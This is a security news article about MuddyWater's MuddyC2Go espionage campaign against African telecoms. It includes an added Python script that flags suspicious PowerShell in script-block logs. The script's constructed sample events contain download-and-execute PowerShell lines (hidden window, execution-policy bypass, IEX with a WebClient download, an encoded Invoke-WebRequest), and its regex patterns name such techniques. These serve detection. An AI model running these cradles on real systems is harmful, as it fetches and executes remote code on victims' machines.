Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa

The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania.

The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix.

Active since at least 2017, MuddyWater is assessed to be affiliated with Iran’s Ministry of Intelligence and Security (MOIS), primarily singling out entities in the Middle East.

The cyber espionage group’s use of MuddyC2Go was first highlighted by Deep Instinct last month, describing it as a Golang-based replacement for PhonyC2, itself a successor to MuddyC3. However, there is evidence to suggest that it may have been employed as early as 2020.

While the full extent of MuddyC2Go’s capabilities is not yet known, the executable comes fitted with a PowerShell script that automatically connects to Seedworm’s C2 server, thereby giving the attackers remote access to a victim system and obviating the need for manual execution by an operator.

The latest set of intrusions, which took place in November 2023, has also been found to rely on SimpleHelp and Venom Proxy, alongside a custom keylogger and other publicly available tools.

Attack chains mounted by the group have a track record of weaponizing phishing emails and known vulnerabilities in unpatched applications for initial access, followed by reconnaissance, lateral movement, and data collection.

In the attacks documented by Symantec targeting an unnamed telecommunications organization, the MuddyC2Go launcher was executed to establish contact with an actor-controlled server, while also deploying legitimate remote access software such as AnyDesk and SimpleHelp.

The entity is said to have been previously compromised by the adversary earlier in 2023, during which SimpleHelp was used to launch PowerShell, deliver proxy software, and also install the JumpCloud remote access tool.

“In another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to connect to known Seedworm infrastructure,” Symantec noted. “A custom build of the Venom Proxy hacktool was also executed on this network, as well as the new custom keylogger used by the attackers in this activity.”

By using a combination of bespoke, living-off-the-land, and publicly available tools in its attack chains, the goal is to evade detection for as long as possible in order to meet its strategic objectives, the company said.

“The group continues to innovate and develop its toolset when required in order to keep its activity under the radar,” Symantec concluded. “The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks.”
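
Symantec’s closing advice is to watch for suspicious PowerShell use, and the earlier paragraph notes that the MuddyC2Go executable carries a PowerShell script that connects out on its own. The following Python triage script is an added example, not code from Symantec, Deep Instinct, or the MuddyC2Go tooling, and it knows nothing about that specific framework. It scores PowerShell script-block text (as captured by Script Block Logging, Event ID 4104, or from process command lines) against a handful of generic indicators that appear across many PowerShell-based intrusions: encoded commands, hidden windows, profile and execution-policy evasion, download cradles, and Invoke-Expression. The sample events, the indicator weights, and the alert threshold are all constructed for this example.

```python
import base64
import re

# Generic PowerShell abuse indicators. Weights and names are this example's own choice.
INDICATORS = {
    "encoded_command":    (re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), 3),
    "hidden_window":      (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "no_profile":         (re.compile(r"-nop\b|-noprofile\b", re.I), 1),
    "exec_policy_bypass": (re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 2),
    "download_cradle":    (re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I), 3),
    "invoke_expression":  (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
}
ALERT_THRESHOLD = 4  # constructed: a lone download cradle from an admin shell should not page anyone

ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_command(command: str) -> str:
    """PowerShell's -EncodedCommand expects base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(script: str):
    """Return the decoded -EncodedCommand payload if one is present and valid, else None."""
    m = ENCODED_RE.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> dict:
    """Score one script-block event; indicators inside an encoded payload count too."""
    script = event["script"]
    decoded = decode_encoded_command(script)
    texts = [script] + ([decoded] if decoded else [])
    hits, score = [], 0
    for name, (pattern, weight) in INDICATORS.items():
        if any(pattern.search(t) for t in texts):
            hits.append(name)
            score += weight
    return {
        "host": event["host"], "user": event["user"],
        "indicators": hits, "score": score, "decoded": decoded,
        "alert": score >= ALERT_THRESHOLD,
    }


def triage_all(events):
    """Return only the events that cross the alert threshold."""
    return [r for r in (triage(e) for e in events) if r["alert"]]


# Constructed sample events in the shape of Event ID 4104 ScriptBlockText; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice",
     "script": "Get-ChildItem C:\\Reports | Measure-Object"},
    {"host": "ws02", "user": "svc-backup",
     "script": "powershell -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
               ".DownloadString('http://203.0.113.10/a')\""},
    {"host": "ws03", "user": "bob",
     "script": "powershell -EncodedCommand " + encode_command(
         "Invoke-WebRequest -Uri http://192.0.2.5/x.ps1 -OutFile $env:TEMP\\x.ps1")},
    {"host": "ws04", "user": "admin",
     "script": "Invoke-WebRequest -Uri https://updates.example.com/agent.msi -OutFile C:\\Temp\\agent.msi"},
]

if __name__ == "__main__":
    for alert in triage_all(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['user']} score={alert['score']} {alert['indicators']}")
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

Two design points matter in practice. Decoding the `-EncodedCommand` payload before scanning is what lets the third event fire on its download cradle; scanning only the raw text would see nothing but base64. The threshold keeps the fourth event (an administrator fetching an installer from a normal shell) below alert level, which is the kind of false positive that makes PowerShell rules get disabled. In a real deployment the script-block text would come from Script Block Logging or an EDR, and the weights would be tuned to the environment’s own baseline.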

The development comes as an Israel-linked group called Gonjeshke Darande (meaning “Predatory Sparrow” in Persian) claimed responsibility for a cyber attack that disrupted a “majority of the gas pumps throughout Iran” in response to the “aggression of the Islamic Republic and its proxies in the region.”

The group, which reemerged in October 2023 after going quiet for nearly a year, is believed to be linked to the Israeli Military Intelligence Directorate, having conducted destructive attacks in Iran, including on steel facilities, petrol stations, and rail networks in the country.
